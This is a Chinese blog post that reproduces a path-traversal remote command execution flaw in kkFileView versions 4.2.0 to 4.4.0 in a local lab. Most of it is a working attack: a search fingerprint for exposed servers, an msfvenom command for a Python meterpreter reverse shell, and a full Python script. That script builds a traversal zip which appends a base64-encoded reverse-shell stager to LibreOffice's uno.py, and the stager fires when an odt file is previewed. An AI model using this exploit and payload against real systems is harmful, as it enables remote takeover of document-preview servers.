[漏洞复现]kkfileview 任意命令执行漏洞

2024-06-08 427 0

kkfileview 任意命令执行漏洞

​ kkFileView 为文件文档在线预览解决方案,该项目使用流行的spring boot搭建,易上手和部署,基本支持主流办公文档的在线预览,如doc,docx,xls,xlsx,ppt,pptx,pdf,txt,zip,rar,图片,视频,音频等等。

指纹信息

title="kkfileview"

[漏洞复现]kkfileview 任意命令执行漏洞插图

漏洞复现

影响版本 4.2.0 <= kkfileview <= 4.4.0

[漏洞复现]kkfileview 任意命令执行漏洞插图1

漏洞复现在本地完成 centos7(部署kkfileview):192.168.20.128 kali:192.168.20.129

kkfileview采用docker部署

wget https://kkview.cn/resource/kkFileView-4.2.0-docker.tar
docker load -i kkFileView-4.2.0-docker.tar
docker run -itd -p 8012:8012 keking/kkfileview:4.2.0

该漏洞可通过路径穿越将恶意文件上传到任意位置,并会在存在的文件下追加内容,在kkfileview接收到odt文件并且上传人尝试预览时会调用/opt/libreoffice7.3/program/uno.py这个python文件来进行odt文件转换为pdf预览,使用msf生成python木马文件

msfvenom -p python/meterpreter/reverse_tcp LHOST=192.168.20.129 LPORT=11321 -f raw -o kkview.py

[漏洞复现]kkfileview 任意命令执行漏洞插图2

利用python脚本生成可完成目录穿越的压缩包

import zipfile

if __name__ == "__main__":
    try:
        binary1 = b'test'
        binary2 = b'exec(__import__(\'base64\').b64decode(__import__(\'codecs\').getencoder(\'utf-8\')(\'aW1wb3J0IHNvY2tldCx6bGliLGJhc2U2NCxzdHJ1Y3QsdGltZQpmb3IgeCBpbiByYW5nZSgxMCk6Cgl0cnk6CgkJcz1zb2NrZXQuc29ja2V0KDIsc29ja2V0LlNPQ0tfU1RSRUFNKQoJCXMuY29ubmVjdCgoJzE5Mi4xNjguMjAuMTI5JywxMTMyMSkpCgkJYnJlYWsKCWV4Y2VwdDoKCQl0aW1lLnNsZWVwKDUpCmw9c3RydWN0LnVucGFjaygnPkknLHMucmVjdig0KSlbMF0KZD1zLnJlY3YobCkKd2hpbGUgbGVuKGQpPGw6CglkKz1zLnJlY3YobC1sZW4oZCkpCmV4ZWMoemxpYi5kZWNvbXByZXNzKGJhc2U2NC5iNjRkZWNvZGUoZCkpLHsncyc6c30pCg==\')[0]))'
        zipFile = zipfile.ZipFile("hack.zip", "a", zipfile.ZIP_DEFLATED)
        info = zipfile.ZipInfo("hack.zip")
        zipFile.writestr("test", binary1)
        zipFile.writestr("../../../../../../../../../../../../../../../../../../../opt/libreoffice7.3/program/uno.py", binary2)
        zipFile.close()
    except IOError as e:
        raise e

上传生成的hack.zip之后,点击预览激活该恶意文件追加内容到/opt/libreoffice7.3/program/uno.py

[漏洞复现]kkfileview 任意命令执行漏洞插图3

上传obt文件(可新建一个word文件另存为obt文件),点击预览,即可在msf上监听到shell上线

[漏洞复现]kkfileview 任意命令执行漏洞插图4


4A评测 - 免责申明

本站提供的一切软件、教程和内容信息仅限用于学习和研究目的。

不得将上述内容用于商业或者非法用途,否则一切后果请用户自负。

本站信息来自网络,版权争议与本站无关。您必须在下载后的24个小时之内,从您的电脑或手机中彻底删除上述内容。

如果您喜欢该程序,请支持正版,购买注册,得到更好的正版服务。如有侵权请邮件与我们联系处理。敬请谅解!

程序来源网络,不确保不包含木马病毒等危险内容,请在确保安全的情况下或使用虚拟机使用。

侵权违规投诉邮箱:4ablog168#gmail.com(#换成@)

相关文章

办事处网络安全监控与事件响应;国外员工终端安全性怎么保障 | FB甲方群话题讨论
拿不下总统之位,那就用热加载拿下验证码识别与爆破好了!
Sooty:一款SoC分析一体化与自动化CLI工具
shiro CVE-2016-6802 路径绕过(越权)
Apache Solr 身份验证绕过漏洞(CVE-2024-45216)详解
llama_index的CVE-2024-4181漏洞根因分析

发布评论